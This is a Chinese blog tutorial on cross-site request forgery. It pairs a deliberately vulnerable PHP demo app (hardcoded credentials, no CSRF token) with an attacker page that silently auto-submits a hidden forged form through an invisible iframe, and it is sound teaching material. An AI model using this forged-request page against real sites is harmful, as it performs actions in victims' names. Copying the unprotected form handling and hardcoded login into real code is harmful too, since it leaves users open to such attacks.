CSRF 跨站请求伪造

最新推荐文章于 2021-06-20 23:26:20 发布
最新推荐文章于 2021-06-20 23:26:20 发布
阅读量164 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39647045/article/details/94840247
版权

CSRF(Cross Site Request Forgery),中文是跨站请求伪造。CSRF攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。

举个列子

假如A站为受信任的银行网站,其中有个银行转账的表单;B站为黑客网站,其中有个页面带有伪造A站银行转账表单提交的请求,当用户登录A站后,在不退出的情况下,再去访问B站,就会向黑客指定账户转账。

A站代码(这里通过表单提交文本内容模拟银行转账)

index.php 控制器文件

<?php

namespace controller;

use mini\Controller;

class Index extends Controller
{
    /**
     * 构造方法 未登录 前往登录
     * Index constructor.
     */
    public function __construct()
    {
        parent::__construct();
        if($_GET['a'] == 'index') {
            if (!$_SESSION['uid']) {
                redirect('/index/login');
            }
        }
    }

    /**
     * 表单提交页面及展示提交的内容
     */
    public function index()
    {
        if($_POST){
            $_SESSION['content'][] = $_POST['content'];
        }
        //session_destroy();
        var_dump($_SESSION['content']);
        $this->display();
    }

    /**
     * 用户登录界面及操作
     */
    public function login()
    {
        if($_POST['submit']){
            if(($_POST['uname'] == 'jack') && ($_POST['passwd'] == '123456')){
                $_SESSION['uid'] = 1;
                redirect('/index/index');
            }else{
                redirect('/index/login');
            }
        }else{
            $this->display();
        }
    }
}

login.html 登录视图

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
    <form method="post">
        <label>用户名:<input type="text" name="uname" /></label><br>
        <label>密码:<input type="text" name="passwd" /></label><br>
        <input name="submit" type="submit" value="提交" />
    </form>
</body>
</html>

index.html 表单提交视图

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
    <form method="post">
        <label>内容:<textarea name="content"></textarea></label>
        <input type="submit" value="提交" />
    </form>
</body>
</html>

B站代码 (这里通过iframe隐式提交伪造的表单)

hacker.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
    test
    <script>
        document.write('<form method="post" id="Myform" action="http://test.idev/" target="csrf" style="display:none">\n' +
                '        <label>内容:<textarea name="content">我是hacker</textarea></label>\n' +
                '        <input type="submit" value="提交" />\n' +
                '    </form>');

        var body = document.body;
        var iframe = document.createElement('iframe');
        iframe.name = 'csrf';
        iframe.style = 'display:none';
        body.appendChild(iframe);

        setTimeout(function(){
            document.getElementById('Myform').submit();
        },1000);
    </script>
</body>
</html>
进无止境(* ̄︶ ̄)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【项目实战】Web端常见的高风险漏洞与解决方法(CSRF跨站请求伪造 攻击
本本本添哥
11-25 1089
CSRF(Cross-site request forgery 跨站请求伪造
CSRF跨站请求伪造
最新发布
m0_73170217的博客
02-02 539
csrf漏洞的产生原理及危害、利用方法和防御手段
CSRF跨站请求伪造实例程序
11-07
一个php做的简单的银行管理系统,利用cookie值来达到跨站伪造请求的目的,最终造成银行账户余额被修改。
csrf跨站请求伪造简单示例
10-18
一个简单的csrf跨站请求伪造的示例,只有一个简单的表单提交功能.通过伪造表单提交,完成一个简单的钓鱼案例
CSRF———— (一)跨站伪造请求漏洞示例
weixin_43102772的博客
03-01 228
一、什么是CSRF 1.1简介 csrf(cross-site request forgery)跨站请求伪造。缩写为CSRF或XSRF。CSRF通过利用受信任用户的请求利用受信任的网站,简单来说,就是利用用户请求利用网站。 1.2 CSRF和XSS区别 XSS是利用用户对浏览器的信任 盗取cookie CSRF利用网站对用户浏览器的信任 对网站发起请求,达到攻击者述求 1.3 CSRF原...
防范CSRF跨站请求伪造-Node.js实例
星之空
06-22 608
Anti CSRF Node Example 文章目录Anti CSRF Node ExampleGet StartedChange DetailsNew Express ProjectImport csurfGenerate CSRF TokenCustom Error HandlingSend Back CSRF TokenReference https://github.com/prufen...
CSRF跨站请求伪造,含使用教程和测试工具
05-04
CSRF跨站请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一...
Django CSRF跨站请求伪造防护过程解析
01-01
CSRF全称Cross-site request forgery(跨站请求伪造),是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF。 攻击原理 1、用户访问正常的网站A,浏览器就会保存网站A...
跨站请求伪造-CSRF防护方法
03-12
跨站请求伪造-CSRF防护方法跨站请求伪造-CSRF防护方法
CSRF--跨站请求伪造
buffedon的博客
06-20 259
CSRF--跨站请求伪造原理为何有CSRF漏洞漏洞原理CSRF联合XSS原理防范referer字段token校验xss和CSRF联合使用实例 原理 为何有CSRF漏洞 服务器对浏览器的cookie验证过之后,在有效期内,浏览器不需要再次认证就可以直接访问服务器。攻击利用此原理,借助用户的cookie,进行请求伪造。 漏洞原理 攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过cookie,所以被访问的
CSRF跨站请求伪造(防止黑客攻击
01-15 3397
案例演示 正常逻辑访问:用户名和密码是写死的: 如果输入成功就重定向到转账界面来输入用户名和密码:跳转到转账界面了, 接下来我们输入账号和金额:点击转账会做什么呢?我们先来看一下:哦, 原来是执行转账(假装),然后打印一下结果:伪造逻辑(csrf发生过程): 现在来一个黑客,要利用csrf攻击你的转账界面: 那他就先来了解了一下你的转账界面:知道了你转账的请求的url,就是当前界面 转账所带...
CSRF跨站请求伪造
陌茗228.的博客
04-11 122
CSRF跨站请求伪造利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。 Low: 源代码: <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_
CSRF跨站请求伪造漏洞
heroking
10-22 1275
1 漏洞简介 跨站请求伪造(Cross-site request forgery,简称CSRF),攻击利用受害者身份发起了HTTP请求,导致受害者在不知情的情况下进行了业务操作,如修改资料、提交订单、发布留言或评论等。 CSRF攻击攻击原理及过程如下: 1. 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A; 2.在用户信息通过验证后,网站A产生Cookie信息并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值